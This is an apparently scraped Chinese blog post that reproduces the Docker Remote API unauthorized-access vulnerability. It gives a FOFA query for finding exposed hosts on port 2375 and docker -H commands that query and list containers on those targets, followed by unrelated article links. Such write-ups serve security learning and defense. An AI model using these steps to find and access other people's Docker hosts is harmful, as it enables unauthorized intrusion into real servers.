当前位置: 首页 > news >正文

Docker Remote API未授权访问漏洞复现

一、漏洞信息

Docker Remote API如配置不当可导致未授权访问,被攻击者恶意利⽤。攻击者⽆需认证即可访问到Docker数据,可能导致敏感信息泄露,⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感 信息,或对敏感⽂件进⾏修改,最终完全控制服务器。

二、漏洞复现

1.使用以下fofa语句对docker产品进行搜索:

port="2375"

2.在搜索的结果网站后访问以下路径

http://ip:2375/version        #查看版本信息
http://ip:2375/info        #查看容器信息

3.可以使用-H参数连接目标主机的docker

docker -H tcp://ip:2375 ps        #查看目标主机运行的镜像
docker -H tcp://ip:2375 version        #查看目标主机的版本信息
docker -H tcp://ip:2375 info        #查看目标主机的容器信息

相关文章:

  • DeepSeek 助力 Vue 开发:打造丝滑的日期选择器(Date Picker),未使用第三方插件
  • 在conda虚拟环境中安装jupyter lab-----deepseek问答记录
  • lighten() 函数被弃用:替代方案color.scale()或者color.adjust()
  • C语言基础16:二维数组、字符数组
  • 《DeepSeek训练算法:开启高效学习的新大门》
  • 虚拟机如何添加硬盘
  • Java中CompletableFuture异步工具类
  • 【ENSP】链路聚合的两种模式
  • pypthon字符串与日期转换
  • 6.2.4 基本的数据模型
  • linux笔记:shell中的while、if、for语句
  • Spring 如何解决循环依赖以及那些无法解决的循环依赖
  • 【贝克街迷宫疑云:用侦探思维破解Java迷宫算法】
  • java练习(26)
  • 《open3d pyqt》Alpha重建
  • el-table使用fixed=“right“时固定多列,最左边的左边框不显示
  • C++常用数学函数详解与代码示例
  • C++ ——static关键字
  • ubuntu20.04安装nccl2.16.5
  • 物联网平台建设方案
  • 产品展示类网站/外贸网站推广费用
  • 杭州网站建设公司哪家好/seo关键词怎么填
  • 网站建设的看法有哪些/户外广告
  • 网站开发预算表/免费广州seo
  • 网站模板制作与安装教程/一个完整的产品运营方案
  • 网站怎么做分站/百度seo如何快速排名